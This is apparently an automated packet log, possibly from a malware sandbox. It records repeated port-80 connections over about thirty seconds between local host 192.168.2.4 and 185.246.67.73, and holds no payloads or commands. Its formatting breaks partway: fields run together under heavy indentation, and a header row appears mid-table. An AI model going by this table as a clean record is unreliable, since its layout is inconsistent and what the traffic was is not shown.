Dec 8, 2024 15:28:20.919466972 CET | 49838 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:21.100059032 CET | 80 | 49838 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:21.153819084 CET | 49838 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:21.213378906 CET | 49844 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:21.340321064 CET | 80 | 49844 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:21.340435028 CET | 49844 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:21.340581894 CET | 49844 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:21.459839106 CET | 80 | 49844 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:21.685225010 CET | 49844 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:21.804713011 CET | 80 | 49844 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:21.804723978 CET | 80 | 49844 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:21.804738045 CET | 80 | 49844 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:22.673475981 CET | 80 | 49844 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:22.731976032 CET | 49844 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:22.908338070 CET | 80 | 49844 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:22.950732946 CET | 49844 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:23.038450003 CET | 49850 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:23.038572073 CET | 49844 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:23.157890081 CET | 80 | 49850 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:23.158246040 CET | 80 | 49844 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:23.158330917 CET | 49844 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:23.158510923 CET | 49850 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:23.158510923 CET | 49850 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:23.277826071 CET | 80 | 49850 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:23.513469934 CET | 49850 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:23.633344889 CET | 80 | 49850 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:23.633498907 CET | 80 | 49850 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:23.633507967 CET | 80 | 49850 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:24.046144962 CET | 49838 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:24.046462059 CET | 49856 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:24.046677113 CET | 49850 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:24.165669918 CET | 80 | 49856 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:24.165750027 CET | 49856 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:24.165904045 CET | 49856 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:24.167509079 CET | 80 | 49850 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:24.167576075 CET | 49850 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:24.168226957 CET | 49857 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:24.285142899 CET | 80 | 49856 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:24.287503004 CET | 80 | 49857 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:24.287570000 CET | 49857 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:24.287689924 CET | 49857 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:24.407938957 CET | 80 | 49857 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:24.513361931 CET | 49856 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:24.632921934 CET | 80 | 49856 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:24.632949114 CET | 80 | 49856 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:24.638345003 CET | 49857 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:24.757886887 CET | 80 | 49857 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:24.757898092 CET | 80 | 49857 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:24.757900953 CET | 80 | 49857 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:25.562987089 CET | 80 | 49856 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:25.607044935 CET | 49856 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:25.800937891 CET | 80 | 49856 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:25.841386080 CET | 49856 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:26.934431076 CET | 80 | 49857 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:26.982024908 CET | 49857 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:27.168299913 CET | 80 | 49857 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:27.216356039 CET | 49857 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:27.288331985 CET | 49856 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:27.288335085 CET | 49857 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:27.288664103 CET | 49863 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:27.409336090 CET | 80 | 49863 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:27.409349918 CET | 80 | 49857 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:27.409420967 CET | 49857 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:27.409425020 CET | 49863 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:27.409579039 CET | 49863 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:27.409889936 CET | 80 | 49856 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:27.409939051 CET | 49856 | 80 | 192.168.2.4 | 185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:27.533168077 CET8049863185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:27.764698029 CET4986380192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:27.885030985 CET8049863185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:27.885071039 CET8049863185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:27.885128021 CET8049863185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:28.752886057 CET8049863185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:28.810128927 CET4986380192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:28.992626905 CET8049863185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:29.044522047 CET4986380192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:29.116481066 CET4986980192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:29.240586996 CET8049869185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:29.240677118 CET4986980192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:29.240799904 CET4986980192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:29.360136986 CET8049869185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:29.591556072 CET4986980192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:29.710968971 CET8049869185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:29.710978031 CET8049869185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:29.710988045 CET8049869185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:30.578612089 CET8049869185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:30.622613907 CET4986980192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:30.812388897 CET4987580192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:30.812932014 CET4986980192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:30.813620090 CET8049869185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:30.813664913 CET4986980192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:30.929155111 CET4986380192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:30.930860043 CET4987680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:30.933068037 CET8049875185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:30.933136940 CET4987580192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:30.933264971 CET4987580192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:30.934355021 CET8049869185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:30.934396982 CET4986980192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:31.050590992 CET8049876185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:31.050666094 CET4987680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:31.050756931 CET4987680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:31.052746058 CET8049875185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:31.170931101 CET8049876185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:31.279798985 CET4987580192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:31.401961088 CET8049875185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:31.403704882 CET8049875185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:31.403992891 CET4987680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:31.524527073 CET8049876185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:31.524574041 CET8049876185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:31.524620056 CET8049876185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:32.343777895 CET8049875185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:32.369805098 CET8049876185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:32.388246059 CET4987580192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:32.419483900 CET4987680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:32.576565981 CET8049875185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:32.608395100 CET8049876185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:32.622636080 CET4987580192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:32.653884888 CET4987680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:32.726397038 CET4987580192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:32.726449013 CET4987680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:32.726743937 CET4988180192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:32.846730947 CET8049881185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:32.846781969 CET8049875185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:32.846787930 CET4988180192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:32.846834898 CET4987580192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:32.846945047 CET4988180192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:32.847229004 CET8049876185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:32.847279072 CET4987680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:32.966176987 CET8049881185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:33.200897932 CET4988180192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:33.320602894 CET8049881185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:33.320614100 CET8049881185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:33.320621014 CET8049881185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:34.203406096 CET8049881185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:34.248039007 CET4988180192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:34.442789078 CET8049881185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:34.497615099 CET4988180192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:34.554730892 CET4988380192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:34.674335957 CET8049883185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:34.674506903 CET4988380192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:34.674662113 CET4988380192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:34.793945074 CET8049883185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:35.028986931 CET4988380192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:35.148494005 CET8049883185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:35.148544073 CET8049883185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:35.148638010 CET8049883185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:36.024429083 CET8049883185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:36.075767994 CET4988380192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:36.256392956 CET8049883185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:36.310164928 CET4988380192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:36.376523972 CET4988980192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:36.376626968 CET4988380192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:36.496191025 CET8049889185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:36.496260881 CET4988980192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:36.496345043 CET4988980192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:36.496422052 CET8049883185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:36.496473074 CET4988380192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:36.615798950 CET8049889185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:36.841520071 CET4988980192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:36.963623047 CET8049889185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:36.963682890 CET8049889185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:36.963692904 CET8049889185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:37.592237949 CET4989580192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:37.592536926 CET4988980192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:37.711560965 CET8049895185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:37.711663008 CET4989580192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:37.712145090 CET8049889185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:37.712198019 CET4988980192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:37.717772961 CET4989680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:37.717827082 CET4989580192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:37.837150097 CET8049896185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:37.837174892 CET8049895185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:37.837244034 CET4989680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:37.837368011 CET4989680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:37.956672907 CET8049896185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:38.075958014 CET4989580192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:38.185285091 CET4989680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:38.195360899 CET8049895185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:38.195467949 CET8049895185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:38.304807901 CET8049896185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:38.304852009 CET8049896185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:38.304920912 CET8049896185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:39.035151005 CET8049895185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:39.075762033 CET4989580192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:39.168108940 CET8049896185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:39.216650009 CET4989680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:39.268614054 CET8049895185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:39.325784922 CET4989580192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:39.339266062 CET8049881185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:39.342439890 CET4988180192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:39.400542021 CET8049896185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:39.450772047 CET4989680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:39.522659063 CET4989580192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:39.522906065 CET4989680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:39.522911072 CET4990280192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:39.642287016 CET8049902185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:39.642456055 CET4990280192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:39.642549992 CET8049895185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:39.642569065 CET4990280192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:39.642600060 CET4989580192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:39.642957926 CET8049896185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:39.642999887 CET4989680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:39.761928082 CET8049902185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:39.997936964 CET4990280192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:40.117453098 CET8049902185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:40.117484093 CET8049902185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:40.117516994 CET8049902185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:40.965383053 CET8049902185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:41.013252974 CET4990280192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:41.200793028 CET8049902185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:41.247618914 CET4990280192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:41.321918964 CET4990880192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:41.444087982 CET8049908185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:41.444246054 CET4990880192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:41.444286108 CET4990880192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:41.563534021 CET8049908185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:41.794598103 CET4990880192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:41.914486885 CET8049908185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:41.914499044 CET8049908185.246.67.73192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 8, 2024 15:28:41.914568901 CET | 80 | 49908 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:42.768253088 CET | 80 | 49908 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:42.825757980 CET | 49908 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:43.000971079 CET | 80 | 49908 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:43.044496059 CET | 49908 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:43.117382050 CET | 49909 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:43.117474079 CET | 49908 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:43.117973089 CET | 49756 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:43.118045092 CET | 49902 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:43.118083000 CET | 49881 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:43.236788988 CET | 80 | 49909 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:43.236876011 CET | 49909 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:43.237008095 CET | 49909 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:43.237240076 CET | 80 | 49908 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:43.237318039 CET | 49908 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:43.356597900 CET | 80 | 49909 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:43.591629028 CET | 49909 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:43.711812973 CET | 80 | 49909 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:43.711855888 CET | 80 | 49909 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:43.711889982 CET | 80 | 49909 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:44.279783964 CET | 49915 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:44.280011892 CET | 49909 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:44.399425030 CET | 49916 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:44.401606083 CET | 80 | 49915 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:44.401688099 CET | 49915 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:44.401787043 CET | 80 | 49909 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:44.401792049 CET | 49915 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:44.401835918 CET | 49909 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:44.523757935 CET | 80 | 49916 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:44.525891066 CET | 49916 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:44.525981903 CET | 49916 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:44.526267052 CET | 80 | 49915 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:44.650157928 CET | 80 | 49916 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:44.747765064 CET | 49915 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:44.867753983 CET | 80 | 49915 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:44.868140936 CET | 80 | 49915 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:44.872741938 CET | 49916 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:44.992198944 CET | 80 | 49916 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:44.992208004 CET | 80 | 49916 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:44.992217064 CET | 80 | 49916 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:45.723938942 CET | 80 | 49915 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:45.763226032 CET | 49915 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:45.853246927 CET | 80 | 49916 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:45.903835058 CET | 49916 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:45.957278013 CET | 80 | 49915 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:45.997595072 CET | 49915 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:46.088808060 CET | 80 | 49916 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:46.138216019 CET | 49916 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:46.211612940 CET | 49915 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:46.211615086 CET | 49916 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:46.211918116 CET | 49922 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:46.331346035 CET | 80 | 49915 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:46.331382036 CET | 80 | 49922 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:46.331425905 CET | 49915 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:46.331476927 CET | 49922 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:46.331614017 CET | 49922 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:46.331758022 CET | 80 | 49916 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:46.331806898 CET | 49916 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:46.451025963 CET | 80 | 49922 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:46.685286045 CET | 49922 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:46.806309938 CET | 80 | 49922 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:46.806323051 CET | 80 | 49922 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:46.806338072 CET | 80 | 49922 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:47.665875912 CET | 80 | 49922 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:47.716322899 CET | 49922 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:47.896572113 CET | 80 | 49922 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:47.950701952 CET | 49922 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:48.009186029 CET | 49927 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:48.128547907 CET | 80 | 49927 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:48.130388021 CET | 49927 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:48.130521059 CET | 49927 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:48.250027895 CET | 80 | 49927 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:48.482836962 CET | 49927 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:48.604191065 CET | 80 | 49927 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:48.604211092 CET | 80 | 49927 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:48.604222059 CET | 80 | 49927 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:49.560025930 CET | 80 | 49927 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:49.606928110 CET | 49927 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:49.690546989 CET | 80 | 49927 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:28:49.731929064 CET | 49927 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:49.805232048 CET | 49922 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:49.805641890 CET | 49927 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:28:49.805911064 CET | 49930 | 80 | 192.168.2.4 | 185.246.67.73
